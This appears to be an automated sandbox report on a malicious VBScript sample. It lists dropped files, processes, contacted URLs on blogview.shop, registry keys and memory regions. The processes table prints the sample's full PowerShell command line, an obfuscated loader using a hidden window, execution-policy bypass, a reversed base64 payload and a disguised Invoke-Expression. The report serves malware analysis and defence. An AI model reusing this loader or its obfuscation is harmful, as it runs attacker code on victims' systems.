Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
9jJ4aVtoHG.vbs
|
ASCII text, with very long lines (1397), with CRLF, LF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jigbwgv.vwm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5g10b5x.hjp.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\9jJ4aVtoHG.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $best64code =
'=oQf7kSewJHZkwyJ2g2clJnZlJ3LzVWdsFmdvkGch9Ccvh2cucXZpZ3ZvxmYv8iOzBHd0h2JoEGdhRGZh9GbwVnLrpWdksjNxACclVGbz1CdyFGdztDduVWasNmYldnL0VmbgQ3YlpmYv1ydl5WPrpWdksDMxACclVGbz1CdyFGdztTf7kybkpmYkgyclRXeCRXZH5COmRXV6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9kHcyRGJd11WlRXeit1On5WayR3ctQXdPxnbihGJ9sybkpmYksjcrpGJggVRJ1jbihGJ7Umbpx0dl5kO60FduVWbu9mcpZnbF5SblR3c5N1WrkCcpRCKzV2czVmckRWQ0N3bIRXZHpjOdNnbE5Cdl5kLtVGdzl3Ub1zKvRmaiRyOn0TPn0zKvRmaiRyOp1WYvh2d98GZqJGJ7V2csVWf7I3aqRCIYVUS9kHcyRGJg0VXbVGd5J2W7lyJ05WZ052bj1Cdld2Jgg2Y0FWbtAicrpGJoYWa7kSbsZGJocmbpJHdTRXZn5COmRXd6oTXn5Wak92YuVmL0hXZ05SblR3c5N3W9I3aqRyepEDI0dWLggGdn5WZM5SbsZGJoYWa7kyYyRyKn8iNoNXZyZWZy9iM3YDN2kTN1UzN5UTM3cDOxcjN48yclVHbhZ3LpBXYvA3boNnL3VWa2d2bsJ2LvozcwRHdodCKhRXYkRWYvxmb39GZusWapRSPtxmZkszJ0hHducCIrASK99FJdJXYoN2WgsHI0NWZqJ2btg2YhVmcvZGI8BSK1EDI4FWbtASNg4Wat1CIt9GZuFmctQXZnBCK05WdvNWLg02bk5WYy1CdldGI8BSK3UjLugDNogCIul2bq1CI9AyYyRyO05WZpx2YiV2duQXZuBCdjVmai9WL3Vmb9sWapRyOxEDIwVWZsNXL0JXY0N3OpMDNggXYt1CI1Aibp1WLg02bk5WYy1CdldGKgAXZlx2ctQnchR3c7kzMgAXZlx2ctQnchR3c'
;$base64 = $best64code.ToCharArray() ; [array]::Reverse($base64) ; -join $base64 2>&1> $null ;$lOadcODE = [sYSTEm.text.eNCoDIng]::UtF8.geTstRiNG([SYStEM.coNvErT]::FRoMBAse64stRInG($BASe64))
;$pwn = 'InV'+'Oke'+'-ex'+'Pre'+'SsI'+'ON' ; NeW-aliAS -nAme pwn -vALUE $pWN -forCe ; pWn $LoaDCode ;
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://blogview.shop/api/values/86718771597555964672/refresh6/X
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://blogview.shop/api/values/86718771597555964672/refresh6/0213598674.txt
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://blogview.shop/api/values/refresh6
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://blogview.shop/api/values/
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://blogview.shop/api/values/86718771597555964672/refresh6/
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://blogview.shop/api/values/refresh6X
|
unknown
|
||
|
https://blogview.shop
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
s-part-0032.t-0009.t-msedge.net
|
13.107.246.60
|
||
|
blogview.shop
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2250022E000
|
trusted library allocation
|
page read and write
|
|
|
|
22501B60000
|
trusted library allocation
|
page read and write
|
|
|
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
18F5F9B0000
|
heap
|
page read and write
|
||
|
7FF886B3B000
|
trusted library allocation
|
page read and write
|
||
|
22501A0E000
|
trusted library allocation
|
page read and write
|
||
|
2256C300000
|
trusted library allocation
|
page read and write
|
||
|
18F5FA51000
|
heap
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
2256C868000
|
heap
|
page read and write
|
||
|
2251000F000
|
trusted library allocation
|
page read and write
|
||
|
18F5FA4F000
|
heap
|
page read and write
|
||
|
22500430000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E90000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CDA000
|
trusted library allocation
|
page read and write
|
||
|
22500F3F000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
18F5F8D0000
|
heap
|
page read and write
|
||
|
2256C270000
|
trusted library allocation
|
page read and write
|
||
|
2256C3C3000
|
heap
|
page read and write
|
||
|
22500084000
|
trusted library allocation
|
page read and write
|
||
|
2256C8AC000
|
heap
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
2256C842000
|
heap
|
page read and write
|
||
|
7FF886B22000
|
trusted library allocation
|
page read and write
|
||
|
2256A810000
|
heap
|
page read and write
|
||
|
18F5FA35000
|
heap
|
page read and write
|
||
|
2256C9C0000
|
heap
|
page read and write
|
||
|
7FF886C06000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
7B9C2FB000
|
stack
|
page read and write
|
||
|
F454BFE000
|
stack
|
page read and write
|
||
|
2256AC20000
|
heap
|
page read and write
|
||
|
2256C980000
|
heap
|
page execute and read and write
|
||
|
7FF886CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2256CB35000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
18F5FA57000
|
heap
|
page read and write
|
||
|
18F5FA54000
|
heap
|
page read and write
|
||
|
7B9BAFE000
|
stack
|
page read and write
|
||
|
22501B02000
|
trusted library allocation
|
page read and write
|
||
|
F454C7E000
|
stack
|
page read and write
|
||
|
7FF886B24000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2256A8A0000
|
heap
|
page read and write
|
||
|
18F5FA70000
|
heap
|
page read and write
|
||
|
7DF40CEC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886B40000
|
trusted library allocation
|
page read and write
|
||
|
2256A90A000
|
heap
|
page read and write
|
||
|
18F61790000
|
heap
|
page read and write
|
||
|
2256A902000
|
heap
|
page read and write
|
||
|
2256A908000
|
heap
|
page read and write
|
||
|
2256C250000
|
trusted library allocation
|
page read and write
|
||
|
2256A896000
|
heap
|
page read and write
|
||
|
7FF886CC0000
|
trusted library allocation
|
page read and write
|
||
|
22500001000
|
trusted library allocation
|
page read and write
|
||
|
2256C9E0000
|
heap
|
page read and write
|
||
|
18F5FA52000
|
heap
|
page read and write
|
||
|
7B9C0FE000
|
stack
|
page read and write
|
||
|
18F5FB70000
|
heap
|
page read and write
|
||
|
2256C3B0000
|
heap
|
page execute and read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
2256CB3E000
|
heap
|
page read and write
|
||
|
2256A8C0000
|
heap
|
page read and write
|
||
|
2256CAC0000
|
heap
|
page execute and read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
2256C290000
|
trusted library allocation
|
page read and write
|
||
|
F4549BE000
|
stack
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
18F5FB60000
|
heap
|
page read and write
|
||
|
22501C00000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
18F5FA2F000
|
heap
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
22510070000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
F454FBF000
|
stack
|
page read and write
|
||
|
F454AFD000
|
stack
|
page read and write
|
||
|
F454EFE000
|
stack
|
page read and write
|
||
|
2256C810000
|
heap
|
page read and write
|
||
|
7B9C1FE000
|
stack
|
page read and write
|
||
|
F454DFF000
|
stack
|
page read and write
|
||
|
2256C2C0000
|
heap
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
2256C987000
|
heap
|
page execute and read and write
|
||
|
2250199A000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B23000
|
trusted library allocation
|
page execute and read and write
|
||
|
2256A8C9000
|
heap
|
page read and write
|
||
|
2256CAF0000
|
heap
|
page read and write
|
||
|
7FF886E80000
|
trusted library allocation
|
page read and write
|
||
|
F4548FD000
|
stack
|
page read and write
|
||
|
2256AC25000
|
heap
|
page read and write
|
||
|
2256C87C000
|
heap
|
page read and write
|
||
|
225101B3000
|
trusted library allocation
|
page read and write
|
||
|
2256A890000
|
heap
|
page read and write
|
||
|
18F5FAAD000
|
heap
|
page read and write
|
||
|
2250053F000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2256A904000
|
heap
|
page read and write
|
||
|
2256A820000
|
heap
|
page read and write
|
||
|
2256A94E000
|
heap
|
page read and write
|
||
|
F45503E000
|
stack
|
page read and write
|
||
|
18F5FA30000
|
heap
|
page read and write
|
||
|
2256C280000
|
heap
|
page readonly
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
F454CFF000
|
stack
|
page read and write
|
||
|
2256CB50000
|
heap
|
page read and write
|
||
|
18F5FB75000
|
heap
|
page read and write
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BD6000
|
trusted library allocation
|
page read and write
|
||
|
18F5FA50000
|
heap
|
page read and write
|
||
|
18F5FA36000
|
heap
|
page read and write
|
||
|
2250053A000
|
trusted library allocation
|
page read and write
|
||
|
F454B7F000
|
stack
|
page read and write
|
||
|
2256A8DF000
|
heap
|
page read and write
|
||
|
F45513B000
|
stack
|
page read and write
|
||
|
18F5FA29000
|
heap
|
page read and write
|
||
|
7B9BFFD000
|
stack
|
page read and write
|
||
|
2256CD00000
|
heap
|
page read and write
|
||
|
2256A920000
|
heap
|
page read and write
|
||
|
7FF886CD1000
|
trusted library allocation
|
page read and write
|
||
|
18F5FA70000
|
heap
|
page read and write
|
||
|
2256A900000
|
heap
|
page read and write
|
||
|
2256C84A000
|
heap
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
18F5FA2A000
|
heap
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
22510011000
|
trusted library allocation
|
page read and write
|
||
|
7B9B9FE000
|
stack
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
F45493E000
|
unkown
|
page read and write
|
||
|
22501CB8000
|
trusted library allocation
|
page read and write
|
||
|
F454D7F000
|
stack
|
page read and write
|
||
|
7FF886B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
F454873000
|
stack
|
page read and write
|
||
|
2256C2D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2256CB4C000
|
heap
|
page read and write
|
||
|
18F5FAAE000
|
heap
|
page read and write
|
||
|
7FF886D02000
|
trusted library allocation
|
page read and write
|
||
|
18F5FA00000
|
heap
|
page read and write
|
||
|
22510001000
|
trusted library allocation
|
page read and write
|
||
|
22501A14000
|
trusted library allocation
|
page read and write
|
||
|
7B9BCFF000
|
stack
|
page read and write
|
||
|
F455B0E000
|
stack
|
page read and write
|
||
|
7B9BDFF000
|
stack
|
page read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page read and write
|
||
|
18F5F9D0000
|
heap
|
page read and write
|
||
|
2256C8FA000
|
heap
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
225102EA000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
F454A7E000
|
stack
|
page read and write
|
||
|
7B9B8FA000
|
stack
|
page read and write
|
||
|
F454E7D000
|
stack
|
page read and write
|
||
|
2250165A000
|
trusted library allocation
|
page read and write
|
||
|
2256A840000
|
heap
|
page read and write
|
||
|
7FF886E70000
|
trusted library allocation
|
page read and write
|
||
|
22500475000
|
trusted library allocation
|
page read and write
|
||
|
2256A8D3000
|
heap
|
page read and write
|
||
|
2256A948000
|
heap
|
page read and write
|
||
|
2256C90E000
|
heap
|
page read and write
|
||
|
F4550BE000
|
stack
|
page read and write
|
There are 159 hidden memdumps, click here to show them.